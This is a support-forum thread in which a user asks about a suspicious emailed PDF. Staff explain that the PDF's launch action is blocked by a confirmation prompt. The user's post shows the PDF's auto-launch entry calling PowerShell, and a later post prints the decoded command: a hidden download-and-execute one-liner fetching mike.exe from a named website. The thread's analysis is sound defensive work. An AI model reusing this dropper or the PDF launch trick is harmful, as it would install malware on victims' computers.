Hazardous pdf file?
Moderators: TrackerSupp-Daniel, Tracker Support, Paul - Tracker Supp, Vasyl-Tracker Dev Team, Chris - Tracker Supp, Sean - Tracker, Ivan - Tracker Software, Tracker Supp-Stefan
Hazardous pdf file?
I have heard of the potential for pdf attachments to be hazardous but had not seen a suspicious one until this morning. Here are the first several lines of the file as seen in the preview pane of my email client:
%PDF-1.1
1 0 obj
<<
/OpenAction <<
/S /Launch/Win
<<
/F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P
(powershell.exe -EncodedCommand
Would someone please provide a brief explanation of what this is because it appears that an execution of powershell will occur when the pdf is opened. If so, what settings do I need to look at in Editor and Viewer to insure such action is prevented?
%PDF-1.1
1 0 obj
<<
/OpenAction <<
/S /Launch/Win
<<
/F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P
(powershell.exe -EncodedCommand
Would someone please provide a brief explanation of what this is because it appears that an execution of powershell will occur when the pdf is opened. If so, what settings do I need to look at in Editor and Viewer to insure such action is prevented?
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
- Contact:
Re: Hazardous pdf file?
Hi Brian,
Thanks for the post - without the file, we can only tell as much as you can. It looks like the PDF is set to run a powershell command, but that's all we can see. Please send the file and I'll see if the Dev. Team can take a quick look.
Cheers,
Thanks for the post - without the file, we can only tell as much as you can. It looks like the PDF is set to run a powershell command, but that's all we can see. Please send the file and I'll see if the Dev. Team can take a quick look.
Cheers,
If posting files to this forum, you must archive the files to a ZIP, RAR or 7z file or they will not be uploaded.
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Re: Hazardous pdf file?
File is attached as powershell_exe.7z.
- Attachments
-
- powershell_exe.7z
- This compressed pdf file contains what appears to be a powershell executable command.
- (927 Bytes) Downloaded 90 times
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
- Contact:
Re: Hazardous pdf file?
Hi Brian,
Thanks for that - devs. have taken a look and can't see what it's doing, because the command is encoded, but it's almost certainly malicious and we block this action by default, so you should be safe if you opened it, so long as you did not allow it to run.
Cheers,
Thanks for that - devs. have taken a look and can't see what it's doing, because the command is encoded, but it's almost certainly malicious and we block this action by default, so you should be safe if you opened it, so long as you did not allow it to run.
Cheers,
If posting files to this forum, you must archive the files to a ZIP, RAR or 7z file or they will not be uploaded.
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Re: Hazardous pdf file?
Could you explain what behavior I would expect to see if it tried to run? I am very concerned about this because I normally open pdf attachments. It was just a fluke that I had attachment preview enabled in my email client so noticed the powershell related content before I opened the file.
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
- Contact:
Re: Hazardous pdf file?
Hi Brian,
I'm afraid that we cannot tell what it would do, because the command that it was set to run was encrypted. However, opening the PDF would display this message:
The command will not execute unless you explicitly hit yes, on this message. You should be safe with most malicious files, with our software.
Thanks,
I'm afraid that we cannot tell what it would do, because the command that it was set to run was encrypted. However, opening the PDF would display this message:
The command will not execute unless you explicitly hit yes, on this message. You should be safe with most malicious files, with our software.
Thanks,
If posting files to this forum, you must archive the files to a ZIP, RAR or 7z file or they will not be uploaded.
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Re: Hazardous pdf file?
That popup warning is exactly what I was wondering about. Very nice!
Thanks Will.
--
Brian
Thanks Will.
--
Brian
- Will - Tracker Supp
- Site Admin
- Posts: 6815
- Joined: Mon Oct 15, 2012 9:21 pm
- Location: London, UK
- Contact:
Re: Hazardous pdf file?
No worries Brian
If posting files to this forum, you must archive the files to a ZIP, RAR or 7z file or they will not be uploaded.
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Thank you.
Best regards
Will Travaglini
Tracker Support (Europe)
Tracker Software Products Ltd.
http://www.tracker-software.com
Re: Hazardous pdf file?
The decoded command is:
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe)
It hidden downloads a file "mike.exe" from ncduganda.org and executes it.
Cheers
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe)
It hidden downloads a file "mike.exe" from ncduganda.org and executes it.
Cheers
- Patrick-Tracker Supp
- Site Admin
- Posts: 1645
- Joined: Thu Mar 27, 2014 6:14 pm
- Location: Vancouver Island
- Contact:
Re: Hazardous pdf file?
Hello ChrisZ16
Thank you very much for the translation! That makes it abundantly clear that this file does indeed contain malicious content.
Cheers!
Thank you very much for the translation! That makes it abundantly clear that this file does indeed contain malicious content.
Cheers!
If posting files to this forum, you must archive the files to a ZIP, RAR or 7z file or they will not be uploaded.
Thank you.
Cheers,
Patrick Charest
Tracker Support North America
Thank you.
Cheers,
Patrick Charest
Tracker Support North America